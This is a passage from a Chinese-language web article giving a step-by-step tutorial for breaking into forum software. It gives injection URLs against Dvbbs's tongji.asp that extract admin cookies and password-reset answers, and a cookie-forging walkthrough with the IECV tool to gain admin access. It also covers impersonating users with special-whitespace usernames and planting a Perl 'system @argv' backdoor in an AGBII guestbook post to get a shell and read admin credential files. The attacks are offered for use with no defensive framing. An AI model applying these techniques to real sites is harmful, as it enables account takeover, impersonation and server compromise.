当前位置: 移动技术网 > 网络运营>安全>网站安全 > 论坛通用入侵一条龙教学(图)

论坛通用入侵一条龙教学(图)

2019年05月29日  | 移动技术网网络运营  | 我要评论
加密处理的,但这已经足够了。最后再输入“http://www.target.com/dvbbs/tongji.asp?orders=2&n=10 usercookies,”,回车后在出现的窗口中(如图5)记下管理员的usercookies的值,一般为0。好了,到现在黑客就得到管理员的cookies的内容了,他可以通过在本机中伪造管理员的cookies来入侵论坛。如果你输入“http://www.target.com/dvbbs/tongji.asp?orders=2&n=10 quesion,”,还可以得到论坛中用户忘记密码时的密码提示问题,输入“http://www.target.com/dvbbs/tongji.asp?orders=2&n=10 answer,”可以得到他的问题答案(也是md5加密的)!



  接下来在该论坛新注册一个新用户,然后用cookies管理软件(如iecv)改造自己在该论坛的cookies。其实,这一步的目的就是通过cookies来让论坛以为你就是管理员,因为论坛判定是否是管理员的主要方法就是通过论坛id和密码来实现的,而cookies中记录的正是论坛id和密码,当然这个密码是加密存放在cookies中的。



  运行cookies管理软件iecv,选择“view”菜单下的“obsolete cookie file”,就可以看到你的电脑中的cookies文件了。由于你是新注册的论坛id,所以在iecv的主界面的最开头就可以看到该论坛的cookies文件,在它前面打上“√”,然后右键单击界面中央的aspsky,选择弹出菜单中的“编辑cookie的内容”(图6),然后就可以编辑你的cookies内容了,把里面的内容替换为你刚刚查到的内容即可。最后关闭该软件,并关闭浏览器,重新输入该论坛的地址,进入后黑客就会成为该论坛的管理员了!此时这个论坛就在黑客的掌握之中了,干什么都可以随心所欲了!



  举个例子,黑客可以在打开记事本后按下tab键或capslock tab键,这样就会形成一个特殊的空格。复制该空格,用他想冒名发言的用户名加上该空格注册一个新用户,这样就会成功注册一个和对方一样的名字,接下来就可以冒名发言了,稍不留意别人就会上当。形成特殊空格还可以采用区位输入法输入aaaa或aaab或aaac。另外在html标签里还可以使用 ( 就是显示空白内容的意思)制造一个特殊的空格。用区位输入法输入的aaaa/aaab/aaac在asp编写的程序里冒名的成功率极高,而tab键和 制造的特殊空格在php程序里成功率更高些。更可怕的是,在wdb论坛和ibb论坛,用tab键构造的特殊用户名可以取得和原用户相同的权限。如果原用户名是管理员,那黑客构造的这个冒名用户也会变成管理员! 第三招:暗渡陈仓形成网页后门

  大家知道,在cgi或perl程序里如果写入“system @argv;#”(注意输入时没有引号),就会形成一个有趣的网页后门。在ie地址栏中输入http://ip/*.pl?dir就会看到网站的物理目录。以网上非常流行的agbii免费cgi留言本为例,该留言本里的留言是以第n条留言的数目、用户名、标题和内容等等来排列的,而且留言都是按照顺序排放在一个固定目录data/用户名下面的。说起来好像很复杂,让我们来看图7,假设这是黑客在agbii免费cgi留言本中的留言,它是该留言本中的第14条留言,假设其注册的用户名是;system,标题为@argv;#,内容则是“呵呵”,在data/222目录下的14.pl的文件内容就是如图8所示。由于此留言本的用户就是222,因此只要黑客在浏览器地址栏中输入http://ip/book/data/222/14.pl?dir就会得到一个shell了(图9)。注意这里的http://ip/book/是留言本的地址。得到shell之后,黑客还可以得到该管理员的密码!只要在浏览器的地址栏中输入“http://ip/book/data/管理员名字/14.pl?type 该留言本的物理目录\user\管理员名字.cgi”就可以了。以本文为例,只要输入“http://www.xxx.com/book/data/lxgyp/14.pl?type d:\虚拟主机\web\book\user\lxgyp.cgi”就可以得到该管理员的用户名和密码、注册时的邮件地址、他的网站地址、ip地址以及登陆时间,一目了然,尽在掌握!












如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网